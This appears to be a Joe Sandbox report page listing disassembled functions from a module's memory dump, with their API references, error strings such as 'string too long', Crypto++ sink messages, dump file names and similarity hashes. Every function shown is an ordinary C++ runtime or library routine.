Function 6CE45810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE4584D

Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE890ED
Part of subcall function 6CE890D8: __CxxThrowException@8.LIBCMT ref: 6CE89102
Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE89113

VariantClear.OLEAUT32(00000000), ref: 6CE45899

Strings

vector<T> too long, xrefs: 6CE45848

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$ClearException@8ThrowVariantXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 2677079660-3788999226
Opcode ID: 2c2d6898ec5464125ea6450655ec1cf1e2e35123e8a24e0b3874c5a1bf00a36b
Instruction ID: b5b3f13abed70494fed544f7c1b1b4cbf504e365a277731ab4958cd9da8b1dab
Opcode Fuzzy Hash: 2c2d6898ec5464125ea6450655ec1cf1e2e35123e8a24e0b3874c5a1bf00a36b
Instruction Fuzzy Hash: FA217771A016059FD710CF68D880A5EB7F5EF48764F248A3DE46597B40DB34A9048B91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE35750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE3576B

Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE890ED
Part of subcall function 6CE890D8: __CxxThrowException@8.LIBCMT ref: 6CE89102
Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE89113

std::_Xinvalid_argument.LIBCPMT ref: 6CE35782

Strings

string too long, xrefs: 6CE35766, 6CE3577D

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: e778c2113e6c38f5aa50d7b57d3ea83fa02d05adfa2b75ad05ac8721be6d7d56
Instruction ID: a805d43e3032dc871af2f9e675c3845dcf3095ee64cfa327d42f926d0de5ff6d
Opcode Fuzzy Hash: e778c2113e6c38f5aa50d7b57d3ea83fa02d05adfa2b75ad05ac8721be6d7d56
Instruction Fuzzy Hash: 201187333057209FD321DA9CA880A6AF7F9EF95764B70071FE556C7B40C761A804C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE246B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE246C4

Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE890ED
Part of subcall function 6CE890D8: __CxxThrowException@8.LIBCMT ref: 6CE89102
Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE89113

_memmove.LIBCMT ref: 6CE2470B

Strings

string too long, xrefs: 6CE246BF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 1785806476-2556327735
Opcode ID: c8f241b455938187b4ce97963e8634521584a183a055ac0a8100280d66af86f8
Instruction ID: 6b57ded24c8be28b8f179d79633b317678e7c0cc92414795a2b202eab61ebd06
Opcode Fuzzy Hash: c8f241b455938187b4ce97963e8634521584a183a055ac0a8100280d66af86f8
Instruction Fuzzy Hash: 4D11B9721153145FE7209E78A8C0B6AB7B8AF52718F340B2FE4E787A81D775A4488752

Uniqueness

Uniqueness Score: -1.00%

Function 6CE54D30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

__CxxThrowException@8.LIBCMT ref: 6CE54E00

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

OutputBuffer, xrefs: 6CE54D77
ArraySink: missing OutputBuffer argument, xrefs: 6CE54D91

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
API String ID: 3718517217-3781944848
Opcode ID: 09d312fc70cc23ec98c0b223f0e84e5463e21da7adb85f401ed274effe32ab22
Instruction ID: 978d874b692ccbe9a1ccaead6b17993d0b662d4d9bc148ac456f16a53620ca9d
Opcode Fuzzy Hash: 09d312fc70cc23ec98c0b223f0e84e5463e21da7adb85f401ed274effe32ab22
Instruction Fuzzy Hash: 083116B15087809FC310CF68C480A9ABBF4BB99714F604E2EF4A997B50DB74D508CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE80B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 6CE56480: __CxxThrowException@8.LIBCMT ref: 6CE56518
Part of subcall function 6CE56480: __CxxThrowException@8.LIBCMT ref: 6CE56558

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

_memset.LIBCMT ref: 6CE80C4E
_memset.LIBCMT ref: 6CE80C5D

Strings

@Rl, xrefs: 6CE80C32

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_memset$_malloc
String ID: @Rl
API String ID: 4112577501-2839028385
Opcode ID: ff3edcc9367a2cb9f2f9a2cca58e7f979bd0256573635274049e41e5045089d7
Instruction ID: b1ca13129e2986b9efe2ba594dc015634fd4c570350f7dc84d21be39d2a3af84
Opcode Fuzzy Hash: ff3edcc9367a2cb9f2f9a2cca58e7f979bd0256573635274049e41e5045089d7
Instruction Fuzzy Hash: 4621C1B12057409FD314CF19C842B56BBF4FB84718F140A5DE48A8BB91D7B8E408CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6CE81710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE8179E
__CxxThrowException@8.LIBCMT ref: 6CE817B5

Part of subcall function 6CE813A0: std::_Xinvalid_argument.LIBCPMT ref: 6CE813BE
Part of subcall function 6CE813A0: _memmove.LIBCMT ref: 6CE81431
Part of subcall function 6CE813A0: _memmove.LIBCMT ref: 6CE81456

Strings

0Bl, xrefs: 6CE817AD

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _memmove$Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: 0Bl
API String ID: 2097953723-3271211234
Opcode ID: fbd202295f5a009924c87ffc646e5b1e3e82ed060ffde682c1e42bc1884072bf
Instruction ID: e89c2b7fafedff16bf509c48eb6b60a4a90c1f3a6b0cf5dba47c81d421464ebc
Opcode Fuzzy Hash: fbd202295f5a009924c87ffc646e5b1e3e82ed060ffde682c1e42bc1884072bf
Instruction Fuzzy Hash: 6B119A712057018BD720DF89C880B96B3F4FF55308F644A2DD9AA87B81D771F409CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE30150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

__CxxThrowException@8.LIBCMT ref: 6CE30201

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

StringSink: OutputStringPointer not specified, xrefs: 6CE3019B
OutputStringPointer, xrefs: 6CE3018C

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
API String ID: 3718517217-1331214609
Opcode ID: 9aa86abac8fc53b2e0f506c674d894ec7123136bab00a2920784d02db8d8f95d
Instruction ID: 32bdc6dba8ee28b058413682bf29cb35cabd581d1b3815d6521eb8f6c1721e0b
Opcode Fuzzy Hash: 9aa86abac8fc53b2e0f506c674d894ec7123136bab00a2920784d02db8d8f95d
Instruction Fuzzy Hash: A4214F71D05288AFCB04CFD8D891BEDFBB4EB09314F20865EE825A7B91DB356608CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE815B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE81640
__CxxThrowException@8.LIBCMT ref: 6CE81657

Part of subcall function 6CE81250: std::_Xinvalid_argument.LIBCPMT ref: 6CE8126E
Part of subcall function 6CE81250: _memmove.LIBCMT ref: 6CE812E0
Part of subcall function 6CE81250: _memmove.LIBCMT ref: 6CE81305

Strings

0Bl, xrefs: 6CE8164F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _memmove$Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: 0Bl
API String ID: 2097953723-3271211234
Opcode ID: 3afecee009e0004143fd6b8807d823af552f8be83c961187f00ae33bf53d7aa2
Instruction ID: b0eabf9a151e326d36a56a3e2f9cabf1916a10a66cf30142bc378351797c36e6
Opcode Fuzzy Hash: 3afecee009e0004143fd6b8807d823af552f8be83c961187f00ae33bf53d7aa2
Instruction Fuzzy Hash: E1219A711057098FC324DF89C840A52B3F4EF44708F288A6DD5AA87B81DB71F509CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6CE817C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE8184F
__CxxThrowException@8.LIBCMT ref: 6CE81866

Part of subcall function 6CE813A0: std::_Xinvalid_argument.LIBCPMT ref: 6CE813BE
Part of subcall function 6CE813A0: _memmove.LIBCMT ref: 6CE81431
Part of subcall function 6CE813A0: _memmove.LIBCMT ref: 6CE81456

Strings

0Bl, xrefs: 6CE8185E

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _memmove$Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: 0Bl
API String ID: 2097953723-3271211234
Opcode ID: 2c9eed63bd2227e7178efaaa6480020ef1af8853416c159422000bd96e01b602
Instruction ID: 992a2bdab5d8b4aed5ac75c006dae81a6a6c2be3d45f83c5b6ebc32255fedb5a
Opcode Fuzzy Hash: 2c9eed63bd2227e7178efaaa6480020ef1af8853416c159422000bd96e01b602
Instruction Fuzzy Hash: 5E116D76604B058FD320CF58C881B97B3F5FB85708F64492DD8AA87B51D771F909CA62

Uniqueness

Uniqueness Score: -1.00%

Function 6CE33BD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE33C49

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE33C5E

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE33C57

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 757275642-3271211234
Opcode ID: 07763364d8ddeae568ed323da2b9d09b32d41c05733c535f0a72916b1540bc01
Instruction ID: 0d5788bf26ede2d67eefb3fc54063a50da140ecc5d21e8ed134596646459a615
Opcode Fuzzy Hash: 07763364d8ddeae568ed323da2b9d09b32d41c05733c535f0a72916b1540bc01
Instruction Fuzzy Hash: 5C111CB59013089FDB04CF99D881AAEF7F4BF48710F20859EE91997751D770EA04DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE33B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE33BA9

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE33BBE

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE33BB7

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 757275642-3271211234
Opcode ID: 03bde937abc4ac3a1fe6c3ed22ae1d131d76dbe1f090116be8916bd3f1a62151
Instruction ID: 1e142b0ff2678c7445a9fdcf34170bebcb3162e3d2361b8749d1306747bc0701
Opcode Fuzzy Hash: 03bde937abc4ac3a1fe6c3ed22ae1d131d76dbe1f090116be8916bd3f1a62151
Instruction Fuzzy Hash: 5E112EB59003089FDB04CF99D981AAEF7F4BF48700F20859EE91997751D770EA04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE81660 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE816F3
__CxxThrowException@8.LIBCMT ref: 6CE8170A

Part of subcall function 6CE81250: std::_Xinvalid_argument.LIBCPMT ref: 6CE8126E
Part of subcall function 6CE81250: _memmove.LIBCMT ref: 6CE812E0
Part of subcall function 6CE81250: _memmove.LIBCMT ref: 6CE81305

Strings

0Bl, xrefs: 6CE81702

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _memmove$Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: 0Bl
API String ID: 2097953723-3271211234
Opcode ID: f0af40392a1a9947f920beafbd855a9e09b1c125669bfb3db9291e9ff09f027f
Instruction ID: 25d8936e171bbd599975ca13913a57ad8dd1ea28c7bd07daf11cf070f64ec4c9
Opcode Fuzzy Hash: f0af40392a1a9947f920beafbd855a9e09b1c125669bfb3db9291e9ff09f027f
Instruction Fuzzy Hash: 45216D712057018FD310CF58C480B56B3F5FF98708F28892CD8A987B45D771E809CA66

Uniqueness

Uniqueness Score: -1.00%

Function 6CE39840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE398A6
__CxxThrowException@8.LIBCMT ref: 6CE398BB

Strings

0Bl, xrefs: 6CE398B4

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 4063778783-3271211234
Opcode ID: 12015e4fc9b6bddf26802fbaffed1261d3dcf7fb685ccfea0abfb2da32bdb404
Instruction ID: 4f361af1a6910318d1dff0908e45cf1f2fdee86e0f1bc3fdcbc00172764c864c
Opcode Fuzzy Hash: 12015e4fc9b6bddf26802fbaffed1261d3dcf7fb685ccfea0abfb2da32bdb404
Instruction Fuzzy Hash: 1B1109B6900208AFCB04CF89D5419DEBBF8EF58310F6484AEE9189B751D770EA04CBA1

Uniqueness

Uniqueness Score: -1.00%

